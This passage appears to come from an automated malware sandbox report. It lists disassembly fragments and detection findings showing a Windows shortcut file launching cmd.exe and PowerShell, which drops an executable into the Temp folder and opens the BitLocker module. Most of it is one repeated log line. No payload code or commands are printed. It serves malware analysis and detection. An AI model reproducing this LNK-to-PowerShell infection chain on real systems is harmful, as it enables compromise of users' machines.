Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6D8A0 push 0000002Eh; iretd	28_3_02C6D8A2
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6A840 push ebp; retf	28_3_02C6A841
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6B86D push ebx; ret	28_3_02C6B864
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6E80E push eax; iretd	28_3_02C6E81D
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6E83C pushad ; ret	28_3_02C6E841
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6B1DD push eax; ret	28_3_02C6B1DF
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C68904 push ecx; ret	28_3_02C68917
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C69F6A push eax; ret	28_3_02C69F75
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6B70B push ebx; ret	28_3_02C6B864
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6E586 pushad ; retf	28_3_02C6E599
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF28ED push ebx; ret	29_3_02FF28E4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF18C0 push ebp; retf	29_3_02FF18C1
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF58BC pushad ; ret	29_3_02FF58C1
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF588E push eax; iretd	29_3_02FF589D
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF225D push eax; ret	29_3_02FF225F
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF6012 push 00000038h; iretd	29_3_02FF601D
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF5606 pushad ; retf	29_3_02FF5619
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF5FEE push FFFFFFD2h; retf	29_3_02FF6011
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF0FEA push eax; ret	29_3_02FF0FF5
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF278B push ebx; ret	29_3_02FF28E4
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF1179 push FFFFFF82h; iretd	29_3_02FF117B
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF4920 push 0000002Eh; iretd	29_3_02FF4922
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF5F0C push es; iretd	29_3_02FF5F0D

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
